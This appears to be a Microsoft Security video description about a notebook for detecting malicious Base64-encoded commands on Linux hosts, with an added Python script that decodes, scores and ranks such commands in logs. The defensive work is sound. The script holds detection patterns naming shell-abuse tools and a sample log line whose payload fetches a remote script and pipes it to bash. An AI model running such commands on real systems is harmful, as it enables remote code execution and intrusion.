MSTIC has observed an increasing number of Linux attackers encoding their scripts in Base64, both for convenience and to evade detection. Because the commands are encoded, homing in on malicious Base64-encoded commands by reading raw log data is slow and inefficient. To address this, we have created a Jupyter notebook that makes the process easier by decoding, scoring and ranking the Base64 commands found in your Sentinel data. This video walks through the notebook and how to use it.
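As an added illustration of the idea described above (this is not the MSTIC notebook's code, and the page does not describe the notebook's scoring method), the following Python script pulls Base64-looking blobs out of Linux command-line log records, strictly decodes them, discards blobs that are not real Base64 or do not decode to text, scores the decoded text against a small set of shell-abuse indicators, and ranks the results. The log format, the field name `host=`, the regex and the indicator weights are all assumptions; the log lines are constructed for the example.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# Candidate blobs: runs of the Base64 alphabet (16+ chars) plus optional padding,
# not glued to other Base64 characters. Long enough to skip most ordinary words.
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")

# Assumed indicator weights for the DECODED text (not the notebook's scoring).
SUSPICIOUS_TOKENS = {
    r"\bcurl\b": 3, r"\bwget\b": 3, r"https?://": 2, r"\|\s*(ba)?sh\b": 4,
    r"/dev/tcp/": 5, r"\bnc\b|\bncat\b": 3, r"\bchmod\b": 2,
    r"\bpython\d?\s+-c\b": 3, r"\bbase64\s+(-d|--decode)": 2,
    r"\beval\b": 2, r"/tmp/|/dev/shm/": 2, r"\bnohup\b|&\s*$": 1,
}
# Extra weight when the enclosing command itself pipes a decode straight into a shell.
CONTEXT_RE = re.compile(r"base64\s+(-d|--decode)\s*\|\s*(ba)?sh\b")


@dataclass
class Finding:
    host: str
    blob: str
    decoded: str
    score: int
    hits: list


def decode_candidate(blob):
    """Strict Base64 decode; return text only if it is mostly printable ASCII.

    Rejects paths like /var/log/nginx/access (bad length/padding) and random
    alphabetic strings that decode to binary garbage."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw:
        return None
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
    if printable / len(raw) < 0.9:
        return None
    return raw.decode("ascii", errors="replace")


def score_decoded(text):
    """Sum the weights of every indicator pattern present in the decoded text."""
    score, hits = 0, []
    for pattern, weight in SUSPICIOUS_TOKENS.items():
        if re.search(pattern, text):
            score += weight
            hits.append(pattern)
    return score, hits


def rank_log_lines(lines):
    """Extract, decode and score Base64 blobs from log lines; highest score first."""
    findings = []
    for line in lines:
        m = re.search(r"\bhost=(\S+)", line)  # assumed field name
        host = m.group(1) if m else "?"
        for blob in B64_RE.findall(line):
            decoded = decode_candidate(blob)
            if decoded is None:
                continue  # not real Base64, or not text: drop the false positive
            score, hits = score_decoded(decoded)
            if CONTEXT_RE.search(line):
                score += 3
                hits.append("context:decode-piped-to-shell")
            findings.append(Finding(host, blob, decoded, score, hits))
    findings.sort(key=lambda f: f.score, reverse=True)
    return findings


# Constructed sample records (not real telemetry). Blobs are built with
# b64encode so the example does not depend on hand-encoded strings.
MALICIOUS_CMD = "curl -s http://10.0.0.5/a.sh | bash"
BENIGN_CMD = "hello from the nightly build"
_b64 = lambda s: base64.b64encode(s.encode()).decode()
SAMPLE_LOG_LINES = [
    'host=web01 user=alice cmd="ls -la /var/log"',
    f'host=web02 user=root cmd="echo {_b64(MALICIOUS_CMD)} | base64 -d | bash"',
    f'host=db01 user=svc cmd="echo {_b64(BENIGN_CMD)} | base64 -d"',
    'host=ci01 user=bob cmd="git commit -m abcdefghijklmnop"',   # looks like Base64, is not
    'host=web03 user=ops cmd="tail -n 50 /var/log/nginx/access.log"',  # path matches alphabet
]

if __name__ == "__main__":
    for f in rank_log_lines(SAMPLE_LOG_LINES):
        print(f"{f.score:3d}  {f.host:6s}  {f.decoded!r}  {f.hits}")
```

Only two of the five constructed lines survive as findings: the piped `curl ... | bash` payload ranks first, the benign build message scores zero, and the two Base64-looking non-payloads are dropped by the strict decode and printable-ratio checks before scoring. Tune the weights and the minimum blob length to your own environment; the aim is a sorted triage queue rather than a yes/no verdict.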
Learn more https://techcommunity.microsoft.com/t....
#MicrosoftSecurity
Video: Detect Malicious Base64-Encoded Commands on Linux Hosts, uploaded by Microsoft Security on 27 August 2021.